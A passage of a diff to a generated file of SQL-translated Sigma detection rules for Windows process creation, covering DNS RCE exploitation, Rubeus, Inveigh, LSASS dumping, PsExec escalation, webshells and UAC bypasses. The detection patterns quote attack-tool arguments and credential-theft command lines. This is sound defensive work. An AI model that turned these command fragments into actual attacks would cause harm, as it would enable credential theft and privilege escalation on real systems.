"description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName 
LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - 
"title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR 
CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE 
'%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. 
Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron 
Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an 
adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth 
Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": 
"Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast 
%' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' 